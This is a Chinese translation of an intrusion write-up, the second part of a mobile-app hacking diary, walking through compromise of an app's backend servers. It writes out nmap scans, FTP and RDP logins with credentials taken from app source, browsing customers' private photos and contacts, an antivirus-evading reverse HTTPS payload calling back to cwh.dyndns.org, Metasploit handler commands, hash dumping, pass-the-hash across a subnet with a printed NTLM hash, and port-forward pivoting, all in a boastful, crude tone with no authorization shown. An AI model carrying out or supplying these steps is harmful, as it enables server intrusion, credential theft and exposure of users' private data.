《手机应用入侵日记(上)》发布后广受好评，现在推出下集，希望各位喜欢。

[0x03] – 服务端攻击

“多数情况下，与客户端通信的是一个或多个web服务器。对手机应用服务器端的攻击与对普通的web站点攻击类似。除了寻找web应用的漏洞，还需要对目标主机进行扫描，看看运行了哪些服务，之后再进行漏洞扫描，来找到潜在的漏洞。当然，要在许可的情况下进行这些操作喔。”

——SANS渗透测试博客

      [0x03a] – 扫描

根据上文，我们已经从源码中找到了后台IP地址(203.60.240.180 和 203.60.240.183)，接下来，我们就要用Nmap扫描来检测下它的安全性。

首先用 nmap (http://nmap.org)对目标主机进行扫描来查看开放的端口。

对于203.60.240.180，Nmap 扫描结果 ：

—————————————————————

[zeq3ul@12:30:54]-[~]> nmap -sV -PN 203.60.240.180

—————————————————————

对于203.60.240.183，Nmap 扫描结果 ：

—————————————————————

[zeq3ul@12:35:12]-[~]> nmap -sV -PN 203.60.240.183

—————————————————————

从扫描结果中，我们找到了开着的端口，在203.60.240.180 运行着IIS还有终端服务， 203.60.240.183运行着FTP服务。是时候来采摘我们的果实了。

[0x03b] – 获取权限

因为我们已经在源码中找到了用户名和密码(“msec1s”,”S1lentM!@#$ec”)。我们就能访问服务器上运行的FTP服务了。如下：

FTP Server: 203.60.240.183

—————————————————————

—————————————————————

现在我们已经使用账号”msec1s”登录上了FTP服务器。我们能够访问所有客户的联系人，照片，视频等等了。我们希望找到一些“有趣的”照片或者剪辑的视频；但是我们发现了DICK!!!WTF（不懂就百度）！！我们就停止了搜索。给跪…

把目标移向下一个主机, 203.60.240.180, 我们试着通过终端服务来访问它. 非常幸运，我们使用FTP的那个用户名密码(“msec1s”,”S1lentM!@#$ec”)就能访问（大忌！几个服务都使用同一个账号密码）。太爽了！

使用rdesktop访问远程桌面

—————————————————————

[zeq3ul@12:56:04]-[~]> rdesktop -u msec1s -p S1lentM!@#$ec 203.60.240.180

—————————————————————

另外, “msecls” 账号还有管理员权限. 越来越爽了!

[0x03c] – 绕过杀毒软件

很多杀毒软件通过特征码来查杀病毒。如果杀软发现恶意软件的特征码，就会隔离或是清除它。如果杀软在文件中找不到病毒特征码，就认为它是安全的。

Veil，这个由Blackhat安全专家Chris Truncer写的payload生成工具，可以帮助我们出色的完成这个任务。

源码下载：https://www.christophertruncer.com/veil-a-payload-generator-to-bypass-antivirus、

对veil的利用，可以看本站原创翻译的文章《Veil—绕过杀毒软件的payload生成器》。

使用我们的payload和msfveom shellcode,选择Reverse HTTPS到我们的web服务器(cwh.dyndns.org)，命令如下：

现在我们已经得到了payload.exe文件，只要windows系统执行该文件，它就会立刻试着连到我们的服务器上。

[0x03d] – 拿下系统 !!

该拿下系统了！因为可以使用远程桌面服务（端口：3389）来访问目标服务器(203.60.140.180)，目标主机能访问内网，我们就可以打开web服务器，然后远程登录到服务器，执行我们的payload(payload.exe)。运行的Metasploit payload(payload.exe)会连(reverse_https)到我们服务器(cwh.dyndns.org)上的meterpreter payload。

之后，我们使用hashdump得到服务器上的LM/NTLM hash，但是这是行不通的，因为如果你是64位系统，但是meterpreter不运行在64位系统上，就会失败，告诉我们版本不对（Meterpreter是32位程序）.所以我们需要找到一个进程来移植然后在这反弹程序。本例中我们把我们的进程移植到到Winlogon进程（64位）上。

过程如下：

—————————————————————

[zeq3ul@13:16:14]-[~]> sudo msfconsole

[sudo] password for zeq3ul:

msf > use exploit/multi/handler

msf exploit(handler) > set PAYLOAD windows/meterpreter/reverse_https

PAYLOAD => windows/meterpreter/reverse_https

msf exploit(handler) > set LPORT 443

LPORT => 443

msf exploit(handler) > set LHOST cwh.dyndns.org

LHOST => cwh.dyndns.org

msf exploit(handler) > set ExitOnSession false

ExitOnSession => false

msf exploit(handler) > exploit -j

meterpreter > sysinfo

meterpreter > run hashdump

—————————————————————

现在，我们已经获得目标机器上的哈希了。哈希在手，权限我有啊，木哈哈~~

[0x03e] – 还没有结束

在正常情况下，我们接下来就要破解得到的hash了。破解windows hash会有花很多时间（呃，其实win下的密码哈希很好破解），所以你希望不费太多时间久可以绕过密码验证？

传递哈希密码攻击或许会是一个很好的方法，最简单利用“传递哈希密码攻击”的方法是利用Metasploit内置的PSEXEC module模块(exploit/windows/smb/psexec)，这个模块能执行一个提供任意验证功能的payload。

这个payload能伪造一个 Windows SMB 服务的管理员证书(如果当你有了管理员的password或 hash后), 然后再在目标机子上建立一个windows的服务，然后你可以通过这个服务为跳板来提权。 当你获取到一台windows系统机器的哈希值的话，这个工具就成为你的首选的渗透测试工具啦。

著名黑客Carlos Perez也写出了psexec_scanner批量扫描版本，如果有兴趣的ri友，可以从下面的连接找到。

http://www.darkoperator.com/blog/2011/12/16/psexec-scanner-auxiliary-module.html

—————————————————————

meterpreter > background

[*] Backgrounding session 1…

msf exploit(handler) > use auxiliary/scanner/smb/psexec_scanner

msf auxiliary(psexec_scanner) > show options

msf auxiliary(psexec_scanner) > set LHOST cwh.dyndns.org

LHOST => cwh.dyndns.org

msf auxiliary(psexec_scanner) > set LPORT 8443

LPORT => 8443

msf auxiliary(psexec_scanner) > set RHOSTS 203.60.240.0/24

RHOSTS => 203.60.240.0/24

msf auxiliary(psexec_scanner) > set SMBUser administrator

SMBUser => administrator

msf auxiliary(psexec_scanner) > set SMBPass aad3b435b51404eeaad3b435b51404ee:de26cce0356891a4a020e7c4957afc72

SMBPass => aad3b435b51404eeaad3b435b51404ee:de26cce0356891a4a020e7c4957afc72

msf auxiliary(psexec_scanner) > set THREADS 10

THREADS => 10

msf auxiliary(psexec_scanner) > exploit

msf auxiliary(psexec_scanner) > sessions -l

msf auxiliary(psexec_scanner) > sessions -i 3

[*] Starting interaction with 3…

meterpreter > getuid

Server username: NT AUTHORITYSYSTEM

meterpreter > sysinfo

—————————————————————

现在我们需要处理下一个主机了(203.60.240.165).

输入”netstat -an” 查看目标主机开放的端口，我们发现开放了3389端口，但是我们不能直接登录，因为该端口被防火墙过滤了。但是我们可以绕过它。

我们使用Meterpreter中的”portfwd”命令。Portfwd是个常见的利用pivoting技术来提供给攻击主机直接访问目标主机，他的原理就是自动打开另一条TCP连接，将目标端口转发到自动开辟的这条连接的端口上。你可以使用下列的命令来连接你的攻击主机和你的目标主机：

—————————————————————

—————————————————————

最后, 我们使用下面的 rdesktop 命令来连接目标服务器(203.60.240.165)：

—————————————————————

—————————————————————

撸了这么久终于射了，好爽啊！！！

到这里，我们的攻击已经从刚开始的从手机应用里面搜集信息到最后的提权。中间的突破口是在手机应用的反汇编文件中找到它连接的FTP服务器的账号与密码，再通过一点社会工程学猜出了另一台web服务器机器的密码。提权的时候，紧跟着metasploit的步伐，算是一次MSF的高级利用吧，其实也将后面提权的部分看做是一次MSF提权的高级教程。

好了，这次的手机应用入侵已经告一段落了哦，我们最近会开通投稿和积分换取礼物活动，如果各位ri友有什么好文章，请不吝赐教哦，连接入口：http://www.91ri.org/contribute

原文链接：http://www.exploit-db.com/papers/26620/

日币奖励：

本文为译文且为原创、首发，文章较生动形象，并有一定技术含量，给予日币奖励共6枚，译者与修改者分别获得3枚日币。

本文由网络攻防研究室（www.91ri.org）信息安全小组v2djia，月巴_又鸟原创翻译，转载请注明出处。